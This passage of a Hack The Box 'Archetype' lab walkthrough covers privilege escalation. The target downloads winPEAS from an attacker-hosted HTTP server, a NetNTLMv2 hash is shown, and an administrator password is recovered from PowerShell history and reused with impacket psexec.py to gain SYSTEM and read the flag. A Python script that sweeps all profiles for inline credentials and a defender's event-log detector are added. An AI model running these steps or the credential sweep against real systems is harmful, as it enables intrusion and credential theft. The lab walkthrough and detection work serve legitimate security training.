PSEXEC.PY
IDENTIFY PRIVESC VULNERABILITIES (WINPEAS)
root@htb:~$ BROWSER > https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
* place the raw executable in ~/Downloads; http.server serves its working directory, so start it from there (root is not needed for port 8080)
root@htb:~$ cd ~/Downloads && python3 -m http.server 8080
C:\target> powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe
C:\Users\sql_svc\Downloads>dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Downloads
03/08/2025 08:54 AM <DIR> .
03/08/2025 08:54 AM <DIR> ..
03/08/2025 07:12 AM 45,272 nc64.exe
03/08/2025 08:54 AM 1,930,752 winPEASx64.exe
2 File(s) 1,976,024 bytes
2 Dir(s) 10,714,357,760 bytes free
C:\target> powershell -c C:\Users\sql_svc\Downloads\winPEASx64.exe
╔══════════╣ Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: sql_svc::ARCHETYPE:1122334455667788:cc329849205c1f61e52fdc19e00aaccc:01010000000000002b788e114b90db014f2d23496717becc000000000800300030000000000000000000000000300000f11c34cbf3b69a899ead4a6e45502bc55e34a586839efe4a44845307169f1c090a00100000000000000000000000000000000000090000000000000000000000
...
* winPEAS produced this NetNTLMv2 response against its own fixed challenge (1122334455667788); it is crackable offline (hashcat -m 5600) but only recovers sql_svc's own password, which does not help with privesc
╔══════════╣ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 79B
...
╔══════════╣ Current Token privileges
¿ Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
...
╔══════════╣ Analyzing Windows Files Files (limit 70)
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
C:\Users\Default\NTUSER.DAT
C:\Users\sql_svc\NTUSER.DAT
...
* SeImpersonatePrivilege is enabled for sql_svc, so token impersonation (the HackTricks link above) is a viable route; the PSReadLine history file winPEAS listed is the cheaper lead, so check it first
C:\target> dir C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
01/20/2020 05:04 AM <DIR> .
01/20/2020 05:04 AM <DIR> ..
03/17/2020 01:36 AM 79 ConsoleHost_history.txt
1 File(s) 79 bytes
2 Dir(s) 10,713,939,968 bytes free
C:\target> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
* PSReadLine records every interactive line, including ones with a password typed inline: this net use mapped the backups share as administrator with MEGACORP_4dm1n!! in the clear
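The check above reads one user's history by hand; the same hunt generalises to every profile on the box. Added example (Python, not code from the page, PEASS-ng or impacket): a parser that pulls inline credentials out of net use, cmdkey and Sysinternals PsExec command lines and a helper that runs it over every ConsoleHost_history.txt under C:\Users. It is run here over a constructed history whose first line is the one found on Archetype; the remaining sample lines, the profile glob and the set of command shapes handled are assumptions.

```python
import glob
import os
import re

# Constructed PSReadLine history standing in for ConsoleHost_history.txt.
# The first line is the one found on Archetype; the rest are made up to
# exercise the other command shapes the parser understands.
SAMPLE_HISTORY = r"""net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
Get-ChildItem C:\backups
net use \\fileserver\share Summer2020! /user:CORP\svc_backup /persistent:no
cmdkey /add:fileserver /user:CORP\svc_backup /pass:Summer2020!
net use Z: \\fileserver\share * /user:CORP\jdoe
psexec.exe \\dc01 -u CORP\admin -p P@ssw0rd cmd
exit
"""

# Assumed location of the history file inside each profile (the same path
# winPEAS reported for sql_svc above).
HISTORY_GLOB = r"*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"


def _is_target(tok: str) -> bool:
    """Drive letter, UNC path or '*' (prompt for password): never a secret."""
    return tok == "*" or tok.startswith("\\\\") or re.fullmatch(r"[A-Za-z]:", tok) is not None


def parse_net_use(tokens: list[str]):
    """net use [drive:] \\server\share [password|*] /user:name [/opts]
    The password is the bare token right after /user:name, or failing that
    the first bare token that is neither the drive nor the share."""
    user, candidates = None, []
    for i in range(2, len(tokens)):
        tok = tokens[i]
        if tok.lower().startswith("/user:"):
            user = tok[len("/user:"):]
            nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
            if nxt and not nxt.startswith("/") and not _is_target(nxt):
                return user, nxt
        elif not tok.startswith("/") and not _is_target(tok):
            candidates.append(tok)
    return (user, candidates[0]) if user and candidates else None


def parse_cmdkey(tokens: list[str]):
    """cmdkey /add:target /user:name /pass:password"""
    opts = {t.split(":", 1)[0].lower(): t.split(":", 1)[1] for t in tokens[1:] if ":" in t}
    return (opts["/user"], opts["/pass"]) if "/user" in opts and "/pass" in opts else None


def parse_psexec(tokens: list[str]):
    """Sysinternals psexec \\host -u name -p password cmd"""
    user = password = None
    for i, tok in enumerate(tokens[:-1]):
        if tok == "-u":
            user = tokens[i + 1]
        elif tok == "-p":
            password = tokens[i + 1]
    return (user, password) if user and password else None


def find_credentials(history_text: str) -> list[dict]:
    """Return one dict per history line that carried an inline secret.
    Whitespace tokenising is enough for these shapes; quoted passwords with
    spaces would need shlex.split(line, posix=False) instead."""
    findings = []
    for n, line in enumerate(history_text.splitlines(), 1):
        tokens = line.split()
        if not tokens:
            continue
        # strip any directory and .exe so "net.exe" and "C:\...\net.exe" both become "net"
        cmd = re.split(r"[\\/]", tokens[0])[-1].lower().removesuffix(".exe")
        hit = None
        if cmd == "net" and len(tokens) > 2 and tokens[1].lower() == "use":
            hit = parse_net_use(tokens)
        elif cmd == "cmdkey":
            hit = parse_cmdkey(tokens)
        elif cmd in ("psexec", "psexec64"):
            hit = parse_psexec(tokens)
        if hit:
            findings.append({"line": n, "command": cmd, "user": hit[0], "password": hit[1]})
    return findings


def hunt_profiles(users_root: str = r"C:\Users") -> dict[str, list[dict]]:
    """Run find_credentials over every profile's history under users_root."""
    results = {}
    for path in glob.glob(os.path.join(users_root, HISTORY_GLOB)):
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits = find_credentials(fh.read())
        if hits:
            results[path] = hits
    return results


if __name__ == "__main__":
    for f in find_credentials(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['command']} -> {f['user']} : {f['password']}")
    for path, hits in hunt_profiles().items():
        print(path, len(hits), "credential(s)")
```

The fifth sample line is deliberately a miss: a `*` in place of the password means net use prompted for it, so nothing was written to the history and the parser reports nothing for it.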
ESCALATE PRIVS W/ PSEXEC
#escalate privileges
root@htb:~$ python3 psexec.py administrator@{TARGET_IP}
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies
Password: MEGACORP_4dm1n!!
[*] Requesting shares on 10.129.241.250.....
[*] Found writable share ADMIN$
[*] Uploading file yQzLFkqG.exe
[*] Opening SVCManager on 10.129.241.250.....
[*] Creating service pQUO on 10.129.241.250.....
[*] Starting service pQUO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
* psexec.py also accepts the password inline as administrator:'MEGACORP_4dm1n!!'@{TARGET_IP}; it must be single-quoted because !! is a bash history expansion. Leaving it off the target string, as above, makes psexec.py prompt for it and keeps the password out of the shell history
C:\Windows\system32> whoami
nt authority\system
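The psexec.py output above shows exactly what it leaves behind on the host: an 8-letter executable (yQzLFkqG.exe) uploaded through ADMIN$ and a 4-letter service (pQUO) created and started, which Windows records in the System log as event 7045. Added example (Python, not code from the page or from impacket) from the defender's side: a scan over constructed 7045 records that flags that pattern, the Sysinternals PSEXESVC service, and, more loosely, any LocalSystem demand-start service whose binary sits directly in the Windows directory. The records are constructed, and the name-length rules are assumptions drawn from this session's output and impacket's defaults; a tool with renamed binaries would only trip the broader third rule.

```python
import re

# Constructed System-log 7045 records with the EventData fields Windows
# writes (ServiceName, ImagePath, ServiceType, StartType, AccountName).
# The first mirrors the service psexec.py created in the session above;
# the rest are a Sysinternals PsExec install, a benign SQL Server install,
# a hand-placed service in the Windows root, and a 7036 state-change
# event that the scan must ignore.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "pQUO", "ImagePath": r"%systemroot%\yQzLFkqG.exe",
     "ServiceType": "user mode service", "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "ServiceType": "user mode service", "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "MSSQL$SQLEXPRESS",
     "ImagePath": r'"C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS',
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": r"NT Service\MSSQL$SQLEXPRESS"},
    {"EventID": 7045, "ServiceName": "Backup", "ImagePath": r"C:\Windows\backup.exe",
     "ServiceType": "user mode service", "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "pQUO", "param2": "running"},
]

# Binary sitting directly in the Windows directory, i.e. what an upload to
# ADMIN$ produces, whether written as %systemroot%, %windir% or C:\Windows.
WINDIR_ROOT = re.compile(r'^"?(?:%systemroot%|%windir%|[a-z]:\\windows)\\([^\\"]+\.exe)"?\s*$', re.I)
# Assumed impacket psexec.py defaults, consistent with the session above:
# 4 random letters for the service name, 8 random letters for the dropped exe.
IMPACKET_SVC = re.compile(r"^[A-Za-z]{4}$")
IMPACKET_BIN = re.compile(r"^[A-Za-z]{8}\.exe$")


def classify(ev: dict):
    """Return (severity, reason) for a suspicious 7045 record, else None."""
    if ev.get("EventID") != 7045:
        return None
    name = ev.get("ServiceName", "")
    m = WINDIR_ROOT.match(ev.get("ImagePath", ""))
    if name.upper() == "PSEXESVC":
        return "high", "Sysinternals PsExec service (PSEXESVC)"
    if m and IMPACKET_SVC.match(name) and IMPACKET_BIN.match(m.group(1)):
        return "high", "impacket psexec.py pattern: 4-letter service, 8-letter exe dropped via ADMIN$"
    if m and ev.get("AccountName", "").lower() == "localsystem" \
            and ev.get("StartType", "").lower().startswith("demand"):
        return "medium", "LocalSystem demand-start service with its binary in the Windows root"
    return None


def scan(events: list[dict]) -> list[dict]:
    """Apply classify() to parsed events, keeping only the hits."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            hits.append({"service": ev["ServiceName"], "image": ev.get("ImagePath", ""),
                         "severity": verdict[0], "reason": verdict[1]})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"[{h['severity']}] {h['service']} ({h['image']}): {h['reason']}")
```

In a real pipeline the dicts would come from the EventData of exported System-log records (EVTX or forwarded JSON); the rules stay the same, and a 7045 match should be paired with the 5145 share-access event for ADMIN$ from the same source address to tie the install to the upload.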
C:\Windows\system32> cd c:\users
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of c:\Users
01/19/2020 03:10 PM <DIR> .
01/19/2020 03:10 PM <DIR> ..
01/19/2020 10:39 PM <DIR> Administrator
01/19/2020 10:39 PM <DIR> Public
01/20/2020 05:01 AM <DIR> sql_svc
0 File(s) 0 bytes
5 Dir(s) 10,695,737,344 bytes free
C:\Users> cd c:\users\Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of c:\Users\Administrator\Desktop
07/27/2021 01:30 AM <DIR> .
07/27/2021 01:30 AM <DIR> ..
02/25/2020 06:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 10,695,774,208 bytes free
C:\Users\Administrator\Desktop> type root.txt
b91ccec3305e98240082d4474b848528